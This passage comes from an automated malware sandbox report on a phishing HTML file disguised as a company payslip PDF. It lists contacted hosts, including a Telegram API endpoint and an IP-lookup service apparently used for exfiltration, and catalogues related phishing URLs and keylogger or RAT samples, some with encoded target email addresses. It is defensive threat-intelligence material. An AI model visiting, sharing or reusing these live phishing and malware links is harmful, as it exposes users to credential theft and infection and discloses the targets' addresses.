                                                  https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=chromecache_324.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.itnaledi.co.za/wp-json/chromecache_324.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://wpbakery.com)chromecache_252.2.dr, chromecache_312.2.drfalse
                                                    high
                                                    https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft-1-300x211.jpgchromecache_324.2.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://goo.gle/js-api-loadingchromecache_299.2.dr, chromecache_309.2.drfalse
                                                      high
                                                      https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-270x270.pngchromecache_324.2.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://watch.hgtv.com/?utm_source=marketingsite&utm_medium=trendingline_watchfullseasons_textItnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlfalse
                                                        high
                                                        https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingchromecache_309.2.drfalse
                                                          high
                                                          https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?vchromecache_324.2.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://support.google.com/fusiontables/answer/9185417).chromecache_299.2.dr, chromecache_309.2.drfalse
                                                            high
                                                            https://developers.google.com/maps/deprecationschromecache_299.2.dr, chromecache_309.2.drfalse
                                                              high
                                                              https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.mchromecache_324.2.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/maxwellito/vivuschromecache_332.2.dr, chromecache_317.2.drfalse
                                                                high
                                                                https://support.google.com/maps?p=kmlchromecache_248.2.dr, chromecache_212.2.drfalse
                                                                  high
                                                                  https://watch.hgtv.com/watch/hgtv?utm_source=marketingsite&utm_medium=livenowItnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlfalse
                                                                    high
                                                                    https://www.itnaledi.co.za/xmlrpc.php?rsdchromecache_324.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.itnaledi.co.za/comments/feed/chromecache_324.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://schema.orgchromecache_324.2.drfalse
                                                                      high
                                                                      https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?vchromecache_324.2.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.hgtv.com/about-us/hgtv-newsletters/Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlfalse
                                                                        high
                                                                        https://assets.pinterest.com/js/pinit.jschromecache_252.2.dr, chromecache_312.2.drfalse
                                                                          high
                                                                          https://www.itnaledi.co.za/#websitechromecache_324.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?chromecache_324.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://developers.google.com/maps/documentation/javascript/advanced-markers/migrationchromecache_299.2.dr, chromecache_309.2.drfalse
                                                                            high
                                                                            https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15chromecache_324.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-192x192.pngchromecache_324.2.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://instagram.com/hgtvItnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlfalse
                                                                              high
                                                                              https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1chromecache_324.2.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.itnaledi.co.za/wp-content/uploads/2018/03/2-300x128.jpgchromecache_324.2.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.yeastar.comchromecache_324.2.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.pinterest.com/hgtvItnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlfalse
                                                                                high
                                                                                https://www.itnaledi.co.za/wp-json/wp/v2/pages/551chromecache_324.2.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://yoast.com/wordpress/plugins/seo/chromecache_324.2.drfalse
                                                                                  high
                                                                                  https://www.itnaledi.co.za/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.itnaledi.co.za%2F&#038;forchromecache_324.2.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browserschromecache_309.2.drfalse
                                                                                    high
                                                                                    http://go.wpbakery.com/licensingchromecache_252.2.dr, chromecache_312.2.drfalse
                                                                                      high
                                                                                      https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-button-legacy.css?vechromecache_324.2.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-180x180.pngchromecache_324.2.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      151.101.130.137
                                                                                      code.jquery.comUnited States
                                                                                      54113FASTLYUSfalse
                                                                                      149.154.167.220
                                                                                      api.telegram.orgUnited Kingdom
                                                                                      62041TELEGRAMRUfalse
                                                                                      216.58.208.228
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      13.227.8.72
                                                                                      d26p066pn2w0s0.cloudfront.netUnited States
                                                                                      16509AMAZON-02USfalse
                                                                                      104.17.24.14
                                                                                      cdnjs.cloudflare.comUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      196.22.142.143
                                                                                      www.itnaledi.co.zaSouth Africa
                                                                                      37153xneeloZAfalse
                                                                                      23.21.241.83
                                                                                      branched-versed-session.glitch.meUnited States
                                                                                      14618AMAZON-AESUSfalse
                                                                                      142.250.181.100
                                                                                      www.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      208.95.112.1
                                                                                      ip-api.comUnited States
                                                                                      53334TUT-ASUSfalse
                                                                                      239.255.255.250
                                                                                      unknownReserved
                                                                                      unknownunknownfalse
                                                                                      152.199.21.175
                                                                                      sni1gl.wpc.omegacdn.netUnited States
                                                                                      15133EDGECASTUSfalse
                                                                                      104.17.25.14
                                                                                      unknownUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      IP
                                                                                      192.168.2.4
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1567180
                                                                                      Start date and time:2024-12-03 08:52:58 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 6m 7s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:7
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html
                                                                                      Detection:MAL
                                                                                      Classification:mal92.phis.troj.winHTML@26/312@38/13
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .html
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 217.20.59.36, 192.229.221.95, 172.217.17.42, 172.217.19.202, 172.217.17.74, 172.217.19.234, 172.217.19.10, 142.250.181.42, 142.250.181.106, 172.217.17.35, 172.217.19.170, 216.58.208.227, 172.217.17.67, 142.250.181.74, 216.58.208.234, 142.250.181.138, 142.250.181.10, 172.217.21.42, 172.217.19.206
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, maps.googleapis.com, clients2.google.com, hgtvhome.sndimg.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, maps.gstatic.com, optimizationguide-pa.googleapis.com
                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      No simulations
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      149.154.167.220P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                            msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      https://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                        RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                                                                          http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                                                                          • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                                                                          http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                                                                          • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                                                                          13.227.8.72https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                            https://management.sigmaonline.ro/newsletter_re_news.php?from_email=&abonat_id=&newsletter_id=773&followLink=http://ezp-prod1.hul.harvard.edu/login?url=https://accotoxtnation.es/mime/#Y25pY2hvbHNAZGVyaWNrZGVybWF0b2xvZ3kuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                              https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                                                                                https://multikultural.az/web/v2/index.php?query=bWVubmVuQHNlbmlvcnNvbHV0aW9uc3Z0Lm9yZw==Get hashmaliciousUnknownBrowse
                                                                                                                  eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    https://multikultural.az/web/v2/index.php?query=ZW1ja2VubmFAY2hzaS5vcmc=Get hashmaliciousUnknownBrowse
                                                                                                                      151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                      • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                      http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                      • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                      http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                                      • code.jquery.com/jquery-1.7.min.js
                                                                                                                      https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                      • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                      http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                                      • code.jquery.com/jquery-1.7.2.min.js
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      code.jquery.comV-Mail.msgGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.66.137
                                                                                                                      https://secure-page.safedocument01.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 151.101.194.137
                                                                                                                      https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 151.101.2.137
                                                                                                                      https://u1.padletusercontent.com/uploads/padlet-uploads/3025704792/6a713d777f6a37c342ac9ff24818d63a/AContactinyourAddressBook.pdf?token=M4XZQk0-e0NegbPKN1EJFleeEg1SvAJHdhT-Qqn0IkrT5Su7By9B8urGCx2aLfmJMlgU5pPj_rq7vwJTjl3Mo83xjhy_G7fpTmckKxF_1H_Z492RSJiRSa3MofZP5-14SdBnispcHFsREDhhEifxgSR79jzwl3Q_R367A9ozgQRT4PbUB36zYP2FqxL7ZQfSwKjHH3FrzM2GPeTcuOwd8LrJMHGk1iqhNWgBjuGUF8BCo6b-0YxOTsq00c-_jwQFgXebvlVvdLX7cLMfAYfxPg==Get hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.2.137
                                                                                                                      https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9iZVNyLndvbWdoY2NxLnJ1L1V6S2JvLw==Get hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.2.137
                                                                                                                      https://d5h97x04.na1.hubspotlinksstarter.com/Ctc/2Q+113/d5H97x04/VV-M6D2dBFYlW421GWc7K7vL9W7Wb0M15p5chGN6wcHq23m2ndW69sMD-6lZ3mTW3sXdl26-SwxvW2P1jR26FfknmW5MqFpy1DycRpW8smQLW1d__ZwW8XrT451FSrhKW5wFRQF4yFrX6VwDxQv1HC-r9W3RVpBl8YFfg2W38lZmS4Tty8PW1WK9v274Crv8VHlkv-3jwwbXW3nmDJD2D7gDrN2DkYfnG_LhHW34mGlW2CxZ_1W4yJkrr7md1xFW7SGg83758qg9W34XFQD81BLk_W2B5NGc88WvhjW1-BmYr56s2CKW8RFXGn4l1S63f2FbPHW04Get hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.130.137
                                                                                                                      https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.130.137
                                                                                                                      [EXTERNAL] Fw_ LVW 1201831..emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.2.137
                                                                                                                      Wc pay benefit.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.66.137
                                                                                                                      ATT4802.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.2.137
                                                                                                                      d26p066pn2w0s0.cloudfront.nethttps://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.64
                                                                                                                      https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.64
                                                                                                                      https://management.sigmaonline.ro/newsletter_re_news.php?from_email=&abonat_id=&newsletter_id=773&followLink=http://ezp-prod1.hul.harvard.edu/login?url=https://accotoxtnation.es/mime/#Y25pY2hvbHNAZGVyaWNrZGVybWF0b2xvZ3kuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.72
                                                                                                                      AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.47
                                                                                                                      https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.227.8.72
                                                                                                                      https://multikultural.az/web/v2/index.php?query=bWVubmVuQHNlbmlvcnNvbHV0aW9uc3Z0Lm9yZw==Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.227.8.72
                                                                                                                      eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.72
                                                                                                                      http://server.citierupticx.com/specId/product-mje%EF%BC%A0ml.avio.co.jpGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.47
                                                                                                                      https://multikultural.az/web/v2/index.php?query=ZW1ja2VubmFAY2hzaS5vcmc=Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.227.8.72
                                                                                                                      https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.64
                                                                                                                      cdnjs.cloudflare.comV-Mail.msgGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      https://secure-page.safedocument01.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.24.14
